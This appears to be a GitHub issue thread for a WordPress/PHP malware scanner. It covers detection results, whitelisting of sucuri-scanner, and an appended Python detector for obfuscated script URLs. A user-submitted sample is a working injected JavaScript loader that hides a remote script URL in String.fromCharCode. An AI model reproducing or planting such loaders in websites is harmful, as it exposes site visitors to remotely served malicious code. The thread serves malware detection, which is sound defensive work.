Closed darkworks closed 4 years ago
I'm afraid that a URL check is not possible; only code sample matches, and we check only PHP in the first place.
For sucuri-scanner, please provide a release site where I can download it and generate a hash for whitelisting.
Let me check the attached archives and I will update the database soon, thanks.
Only 2 of the samples are not detected; are you using an up-to-date version?
# ER # {/sample 2/search.php}
# ER # {/sample 2/pas.php}
# ER # {/sample 2/s_eval.php}
# ER # {/sample 2/accesson.php}
# ER # {/sample 2/s_noeval.php}
# ER # {/sample 1/wp-mailing.php}
# ER # {/sample 1/wp-vcd.php}
# OK # {/sample 1/index.php}
# ER # {/sample 1/cache-ssxelgwcnhoxnfoc.php}
# ER # {/sample 1/cache-ztopvwnwtfqnsefb.php}
# ER # {/sample 1/wp-craft-report.php}
# OK # {/sample 1/wp-tmp.php}
I see the SCRIPT tags, but these domains change frequently and currently I don't know of any database to check them against, because with a new flag we could send them to be checked.
Found this https://hybrid-analysis.com/sample/8afc3ad8b29ed3695dc0f0ddecfb592560d22f95cdeb95fc5293633c63b43261?environmentId=100 for pushosubk.com/ntfc.php?p=2857367
and they have a public API, so we can implement a query for them with a provided API key: https://hybrid-analysis.com/docs/api/v2
Not listed:
So this only works when users report URLs.
sucuri-scanner
OK, here is the download link for sucuri-scanner: https://wordpress.org/plugins/sucuri-scanner/
Ya, I just came across it and cloned it from GitHub today.
One question: can we write the output to a file? I think there is no flag for file output. Where there are a lot of matches the output is hidden by SSH clients like PuTTY; they shrink the output on the terminal. So it would be good to have a write-to-file flag.
You can use "--output-format" to change the format so no special characters will do any harm, and also just pipe the output; currently there is no option for file logging.
OK, great.
Whitelist updated with recent version of sucuri-scanner
Hi, here are some samples of malicious code I found while cleaning up a few WordPress sites. I think it would be good to add them to the tool.
var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true; var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }
Also, I noticed the tool triggers on a top WordPress plugin: sucuri-scanner.
sample 1.zip sample 2.zip
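The injected-script sample above hides its remote URL in a String.fromCharCode() call so that no domain appears in clear text, which is why a plain domain match never fires. The following is an added example, not code from the scanner project or from this issue: it statically decodes every fromCharCode call with literal integer arguments and flags a file only when a decoded string is a URL and the same file also builds a script element at runtime. The SAMPLE string is constructed for the demo (a placeholder domain encoded the same way as the posted sample), and the function names are my own.

```python
import re

# Constructed sample (not the sample posted in the issue), mirroring its shape:
# a <script> element is created at runtime and its src is hidden inside a
# String.fromCharCode() call so the domain never appears in clear text.
SAMPLE = (
    "var q = 1; var d=document;var s=d.createElement('script'); "
    "s.type='text/javascript'; s.async=true; "
    "var pl = String.fromCharCode(104,116,116,112,115,58,47,47,99,100,110,46,101,"
    "120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,97,46,106,115); "
    "s.src=pl; d.getElementsByTagName('head')[0].appendChild(s);"
)

FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(([^)]*)\)")
SCRIPT_ELEMENT = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")
URL_LIKE = re.compile(r"^(?:https?:)?//[\w.-]+\.[a-z]{2,}", re.IGNORECASE)


def decode_fromcharcode(text):
    """Decode every String.fromCharCode(...) call whose arguments are all
    integer literals. Calls with computed arguments (variables, arithmetic)
    cannot be decoded statically and are skipped rather than guessed."""
    decoded = []
    for m in FROMCHARCODE.finditer(text):
        args = [a.strip() for a in m.group(1).split(",") if a.strip()]
        if args and all(a.isdigit() for a in args):
            decoded.append("".join(chr(int(a)) for a in args))
    return decoded


def scan(text):
    """Return (flagged, urls). A file is flagged only when a decoded string is
    a URL *and* the file also builds a <script> element at runtime; either
    signal alone is common in legitimate code and would cause false positives."""
    urls = [s for s in decode_fromcharcode(text) if URL_LIKE.match(s)]
    flagged = bool(urls) and SCRIPT_ELEMENT.search(text) is not None
    return flagged, urls


if __name__ == "__main__":
    hit, urls = scan(SAMPLE)
    print("flagged" if hit else "clean", urls)
```

The decoded URL, rather than the obfuscated byte list, is what you would then hash or submit to a lookup service such as the hybrid-analysis API mentioned above.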